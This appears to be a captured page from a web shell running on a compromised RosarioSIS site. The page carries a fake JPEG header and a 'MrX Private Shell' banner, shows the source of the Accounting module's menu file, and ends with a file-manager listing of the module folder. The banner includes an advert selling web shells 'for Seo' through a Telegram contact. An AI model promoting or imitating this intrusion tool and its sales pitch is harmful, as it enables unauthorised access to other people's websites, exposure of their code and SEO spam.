����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /** * Accounting module Menu entries * * @uses $menu global var * * @see Menu.php in root folder * * @package RosarioSIS * @subpackage modules */ $menu['Accounting']['admin'] = [ 'title' => _( 'Accounting' ), 'default' => 'Accounting/Incomes.php', 'Accounting/Incomes.php' => _( 'Incomes' ), 'Accounting/Expenses.php' => _( 'Expenses' ), 1 => _( 'Staff Payroll' ), 'Accounting/Salaries.php' => _( 'Salaries' ), 'Accounting/StaffPayments.php' => _( 'Staff Payments' ), 2 => _( 'Reports' ), 'Accounting/DailyTransactions.php' => _( 'Daily Transactions' ), 'Accounting/StaffBalances.php' => _( 'Staff Balances' ), 'Accounting/Statements.php' => _( 'Print Statements' ), 3 => _( 'Setup' ), 'Accounting/Categories.php' => _( 'Categories' ), ] + issetVal( $menu['Accounting']['admin'], [] ); $menu['Accounting']['teacher'] = [ 'title' => _( 'Accounting' ), 'default' => 'Accounting/Salaries.php', 1 => _( 'Staff Payroll' ), 'Accounting/Salaries.php' => _( 'Salaries' ), 'Accounting/StaffPayments.php' => _( 'Staff Payments' ), 2 => _( 'Reports' ), 'Accounting/Statements.php&_ROSARIO_PDF' => _( 'Print Statements' ), ] + issetVal( $menu['Accounting']['teacher'], [] ); $menu['Accounting']['parent'] = [];
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| includes | Folder | 0755 |
|
|
| Categories.php | File | 4.22 KB | 0644 |
|
| DailyTransactions.php | File | 1.27 KB | 0644 |
|
| Expenses.php | File | 7 KB | 0644 |
|
| Incomes.php | File | 6.99 KB | 0644 |
|
| Menu.php | File | 1.21 KB | 0644 |
|
| Salaries.php | File | 4.95 KB | 0644 |
|
| StaffBalances.php | File | 1.32 KB | 0644 |
|
| StaffPayments.php | File | 4.65 KB | 0644 |
|
| Statements.php | File | 1.28 KB | 0644 |
|
| functions.inc.php | File | 10.25 KB | 0644 |
|